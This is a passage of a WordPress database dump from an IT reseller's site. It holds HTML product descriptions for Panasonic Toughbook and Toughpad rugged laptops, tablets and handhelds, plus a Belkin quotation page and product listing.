power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:55:24','2018-12-21 01:55:24','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2692,1,'2018-12-21 09:55:44','2018-12-21 01:55:44','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:55:44','2018-12-21 01:55:44','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2696,1,'2018-12-21 15:23:30','2018-12-21 07:23:30','[vfb id=7]','Get Quotation (Belkin)','','publish','closed','closed','','get-quotation-belkin','','','2018-12-21 15:23:30','2018-12-21 07:23:30','',0,'https://bintara.com.my/?page_id=2696',0,'page','',0),(2697,1,'2018-12-21 15:23:19','2018-12-21 07:23:19','[vfb id=7]','Get Quotation (Belkin)','','inherit','closed','closed','','2696-revision-v1','','','2018-12-21 15:23:19','2018-12-21 07:23:19','',2696,'https://bintara.com.my/blog/2018/12/21/2696-revision-v1/',0,'revision','',0),(2698,1,'2018-12-21 15:23:48','2018-12-21 07:23:48','[vfb id=7]','Get Quotation (Belkin)','','inherit','closed','closed','','2696-autosave-v1','','','2018-12-21 15:23:48','2018-12-21 07:23:48','',2696,'https://bintara.com.my/blog/2018/12/21/2696-autosave-v1/',0,'revision','',0),(3267,1,'2019-09-24 14:05:06','2019-09-24 06:05:06','<h2>THE BELKIN DIFFERENCE</h2>\n<h4></h4>\n<h3>Innovation, with quality at its core</h3>\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\n<h3>Global leader in tech.</h3>\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\n<h3>Always looking to the future</h3>\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\n<h3>An unwavering commitment to earning your trust.</h3>\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\n<h3>Unmatched performance, every time</h3>\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\n<h3>We believe good design matters.</h3>\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\n<center>[maxbutton id=\"1\" ]</center>\n<h3>ProductÂ  : -</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong>\n[maxbutton id=\"9\" ]\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\n<strong>Ultra HD High Speed HDMIÂ® Cable</strong>\n<center> [maxbutton id=\"9\" ] </center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Mini DisplayPortTM to VGA</strong>\n[maxbutton id=\"9\" ]</td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Micro HDMI Adapter</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB A/B Device Cable * A/B DSTP</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.5 mm Audio + Charge RockStarâ„¢</strong>\n[maxbutton id=\"9\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong>\n[maxbutton id=\"9\" ]</td>\n</tr>\n<tr>\n<td 